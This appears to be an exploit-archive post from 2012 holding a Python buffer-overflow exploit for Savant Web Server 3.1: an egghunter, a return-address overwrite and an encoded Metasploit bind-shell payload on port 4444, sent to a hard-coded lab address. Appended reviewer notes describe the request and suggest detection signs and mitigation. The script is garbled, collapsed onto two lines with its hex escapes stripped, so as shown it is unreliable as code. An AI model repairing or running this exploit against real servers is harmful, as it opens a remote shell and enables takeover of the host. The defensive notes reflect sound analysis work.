
Savant Web Server 3.1 Buffer Overflow

Posted on 21 January 2012

#!/usr/bin/python import socket target_address="10.10.10.129" target_port=80 buffer2 = "R0cX" + "R0cX" # msfpayload windows/shell_bind_tcp LPORT=4444 R | msfencode -e x86/shikata_ga_nai -c 4 -t c buffer2 += ("xbdxecx37x93x4bxdbxcfxd9x74x24xf4x58x31xc9xb1" "x6ax83xc0x04x31x68x10x03x68x10x0exc2x4axa1x17" "x59x49xc2xffx91x58x90x5dx29xecxb0x10xb1x92xd3" "xaex07xc5x35x4dx38xf3xdbx06xfcxecx5fxa5x66x93" "xccx5dx07x81xcbxccx59x35x45xd6x2dx15xa1xe7xbb" "xd6x5dx68x57x1bx2ax4fxe8xddxd3xc0x84x0cx0exb7" "x03x24xc7xfdxd2xa5x88x89xf8x07x82x1bxcbx2dx3b" "xfdx9dx67xa9xffxe9x20x9exa9x25x8bx7cxdaxd9x01" "x32x51x36x9axe7x73x8fxe5xeax60xa6x4cx78xefxbb" "x1ex37xd0xbdxaax4fxe7x94x3ex02x34x21xc6xc1xe2" "xa3x6fx76x92x9axedxdax19x2dxcax21xb2xb0xa9xb5" "x72xa1xbbxd0x18x64xd3xb4x85x0cx92xf7x07xcfx13" "xc2x95x57x0ax68x6dx94x6fx5axadxd1x82x26x9fx3c" "x0dx2bxdcx06x6axd3x87x24x9cx14x58x71x42xefx1b" "x90xdcx46x67x51xd3x4cxc4x11x23x29xbdxc5xabx96" "x54x5exb6x08x60x42x5fx7ax76xdfx30x05x76xb7xd1" "xf2x49xbax14x69xa7x7bxa8x6bxb9xadxc8x8ex0fx9e" "x07x7fxa7x89x9bx4dx68xbdx45x77xe0x64xecxa2x18" "x2dx6fx10xc3x14x1dx4ex92x3ax8axf0xd8x07x12x19" "x27x0cx23xe4x0bxbbx6dx97xf8xe8x8cx23xb5xe0x22" "xe8x70x85x10xbbx64xbex09x41xe7x2dx6dx39xfbxcc" "x09xeexcax8fx83x22x5dx77x2bx5bxc6x1bx82x6ex17" "x03xe8x6cx35x55x71xd4x35x72x12x3fx11x6excfx09" "x5axd0x33x40x8ex3fx36xbfxd7xd0x85x17x03xd3xc4" "x7fx17x6exe8x0dxa6x5fx9exd6x1bxf4x2bx8cxb3xad" "x19xb3x70xacx56x76x0cxfbx4fxc4x99xddx99x75x8f" "xa8xfax91x5cxfbx26xbdx8axeaxecx0dxf1x45x4fx72" "xd1x02x47x9cxa5x33x1exf8xc7x00xd2x3dx86xb4x7c" "xb9x85x5fx8cx40x58x7ex7cx5dx76x3axd6x0bx9exfe" "x88xc7x60x56x99x19x7fx7axdax93x72x99x3fx69") badbuffer = "x66x81xcaxffx0fx42x52x6ax02x58xcdx2ex3cx05x5ax74xefxb8x52x30x63x58x8bxfaxafx75xeaxafx75xe7xffxe7" # egghunter searching for R0cX badbuffer += "x90" * (254 - len(badbuffer)) badbuffer += "x09x1Dx40" # EIP Overwrite 00401D09 savant.exe POP EBP, RETN httpmethod = "xb0x03x04x01x7Bx14" # MOV AL, 3; ADD AL, 1; JPO 14 sendbuf = httpmethod + " 
/%" + badbuffer + ' ' + buffer2 sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM) connect=sock.connect((target_address,target_port)) sock.send(sendbuf) sock.close()
# --- Reviewer notes on the listing above (defensive reading) ---
# The listing is a garbled extraction: the script is collapsed onto two
# physical lines (so the inline "#" comments swallow the code that followed
# them) and the byte-string literals show their hex escapes without the
# escape character. Treat it as a reference artifact, not as runnable code;
# the length arithmetic in the comments (254-byte buffer, 3-byte overwrite)
# only holds for the original escaped form.
# What the visible code does, per its own lines and comments: opens one TCP
# connection to the hard-coded lab address target_address:80 and sends a
# single request consisting of a 6-byte non-printable "method", a space,
# the path "/%", a buffer padded with 0x90 up to 254 bytes followed by a
# 3-byte value the author labels as an EIP overwrite (a POP EBP / RETN
# address inside savant.exe), a space, then "R0cX" twice as an egg tag and
# an encoded payload the comment describes as a bind shell on port 4444.
# The socket is then closed without reading a reply.
# Detection angles suggested by those fixed features: an HTTP request line
# whose method bytes are non-printable, a request path "/%" followed by a
# long run of 0x90 bytes, the repeated "R0cX" marker in the request, and --
# if the payload runs as described -- a new listener on TCP/4444 appearing
# on the web server host shortly after the malformed request.
# Mitigation: the vulnerable component is Savant Web Server 3.1 per the
# title; the fix is to retire or replace the affected server rather than
# filter the request. NOTE(review): the single hard-coded return address
# suggests the module is loaded at a fixed base, so host-level DEP/ASLR
# would likely disrupt this particular chain -- confirm before relying on it.

 
